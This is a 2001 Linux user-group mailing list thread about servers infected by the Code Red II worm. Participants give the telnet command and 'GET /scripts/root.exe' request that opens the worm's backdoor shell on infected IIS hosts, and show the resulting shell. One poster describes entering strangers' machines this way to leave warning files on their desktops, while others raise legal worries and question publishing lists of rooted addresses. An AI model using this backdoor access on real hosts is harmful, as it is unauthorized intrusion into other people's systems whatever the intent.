I have contemplated doing the same, but I fear for the idiot who comes back with a lawsuit saying "YOU EVIL PERSON! YOU EXPLOITED MY MACHINE!" When all I was doing was informing them of their problem. On Sun, Aug 05, 2001 at 09:20:44PM -0700, Gary Nichols wrote: > To answer your question... make sure you're hitting enter TWICE after > the command. > > As a security guy myself, I'm deeply troubled by what I'm finding. > Check it out: > > [gary@t0psecret /tmp]# telnet xxx.xxx.xxx.xxx 80 > Trying xxx.xxx.xxx.xxx... > Connected to xxx.xxx.xxx.xxx. > Escape character is '^]'. > GET /scripts/root.exe HTTP/1.0 > > HTTP/1.1 200 OK > Server: Microsoft-IIS/5.0 > Date: Mon, 06 Aug 2001 04:22:13 GMT > Content-Type: application/octet-stream > Microsoft Windows 2000 [Version 5.00.2195] > (C) Copyright 1985-1999 Microsoft Corp. > > c:\inetpub\scripts> > > >From here, I've been leaving a nice text file on \\ALL USERS\\ desktop's > that explains how I did it, and why they need to pay attention to > security patches. :) > > Hopefully they won't take it the 'wrong' way. > > ~g~ > > On 05 Aug 2001 15:15:02 -0700, Craig White wrote: > > Wayne Conrad wrote: > > > > > > On Sun, 05 August 2001, "J.Francois" wrote: > > > > I got tired of counting and just started putting the info into my IDS page. > > > > That way I can send complaints and point them to a URL so I don't have to > > > > keep recreating the same data each time. > > > > > > Are you putting the IP's up too? Every one of the CRII infected boxes is rooted... I wonder about the goodness of publishing a list of known rooted boxes. > > > Wayne > > ________________________________________________ > > > > I've been trying that out > > > > telnet ipaddress_from_my_httpd_access_log 80 > > > > GET /scripts/root.exe HTTP/1.0 > > > > but I can't get a command prompt - what am I missing? > > > > Craig > > ________________________________________________ > > See http://PLUG.phoenix.az.us/navigator-mail.shtml if your mail doesn't post to the list quickly and you use Netscape to write mail. > > > > PLUG-discuss mailing list - PLUG-discuss@lists.PLUG.phoenix.az.us > > http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss > > > > > ________________________________________________ > See http://PLUG.phoenix.az.us/navigator-mail.shtml if your mail doesn't post to the list quickly and you use Netscape to write mail. > > PLUG-discuss mailing list - PLUG-discuss@lists.PLUG.phoenix.az.us > http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss --